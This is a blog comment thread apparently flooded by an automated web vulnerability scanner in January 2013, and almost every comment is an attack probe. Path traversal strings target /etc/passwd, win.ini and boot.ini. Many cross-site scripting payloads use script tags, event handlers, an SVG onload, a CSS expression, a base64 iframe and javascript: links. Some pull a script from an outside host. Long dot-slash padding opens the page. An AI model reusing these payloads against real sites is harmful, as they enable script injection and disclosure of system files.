/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

  783. # 1 on 23 January 2013 at 13:37:

    file:///etc/passwd

  784. # 1 on 23 January 2013 at 13:37:

    /\../\../\../\../\../\../\../etc/passwd

  785. # 1 on 23 January 2013 at 13:37:

    ../../../../../../../../../../windows/win.ini

  786. # <input autofocus onfocus=prompt(941059)> on 23 January 2013 at 13:37:

    1

  787. # 1 on 23 January 2013 at 13:37:

    ../../../../../../../../../../boot.ini

  788. # 1 on 23 January 2013 at 13:37:

    ../../../../../../../../../../windows/win.ini.jpg

  789. # 1 on 23 January 2013 at 13:37:

  790. # zYveI 1<ScRiPt >prompt(988339)</ScRiPt> on 23 January 2013 at 13:37:

    1

  791. # 1 on 23 January 2013 at 13:37:

    ................windowswin.ini

  792. # 1 on 23 January 2013 at 13:37:

    ..\..\..\..\..\..\..\..\windows\win.ini

  793. # 1 on 23 January 2013 at 13:37:

    /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

  794. # 1 on 23 January 2013 at 13:37:

    ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

  795. # 1 on 23 January 2013 at 13:37:

    ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

  796. # 1 on 23 January 2013 at 13:37:

    unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

  797. # 1 on 23 January 2013 at 13:38:

    '"()&%1<ScRiPt >prompt(939353)</ScRiPt>

  798. # 1 on 23 January 2013 at 13:38:

    OTc3MTA5

  799. # 1 on 23 January 2013 at 13:38:

    undefined1<ScRiPt >prompt(901618)</ScRiPt>

  800. # 1 on 23 January 2013 at 13:38:

    1<ScRiPt
    >prompt(991403)</ScRiPt>

  801. # 1 on 23 January 2013 at 13:38:

    1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934698></ScRiPt>

  802. # 1 on 23 January 2013 at 13:38:

    1<ScRiPt
    >prompt(926129)</ScRiPt>

  803. # 1 on 23 January 2013 at 13:38:

    <video><source onerror="javascript:prompt(962660)">

  804. # 1 on 23 January 2013 at 13:38:

    <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962149)"></g></svg>

  805. # 1 on 23 January 2013 at 13:38:

    1[url=javascript:prompt(984516)]http://www.acunetix.com[/url]

  806. # 1 on 23 January 2013 at 13:38:

    1<div style=width:expression(prompt(922813))>

  807. # 1 on 23 January 2013 at 13:39:

    <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='958223'>

  808. # 1 on 23 January 2013 at 13:39:

    <body onload=prompt(945499)>

  809. # 1 on 23 January 2013 at 13:39:

    <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906291)>

  810. # 1 on 23 January 2013 at 13:39:

    <img src=xyz OnErRor=prompt(916709)>

  811. # 1 on 23 January 2013 at 13:39:

    1%3CScRiPt%20%3Eprompt(922824)%3C/sCripT%3E

  812. # 1 on 23 January 2013 at 13:39:

  813. # 1 on 23 January 2013 at 13:39:

    <input autofocus onfocus=prompt(930563)>

  814. # 1 on 23 January 2013 at 13:39:

    n91od
    1<ScRiPt >prompt(939762)</ScRiPt>

Leave a Comment

Fields marked with * are required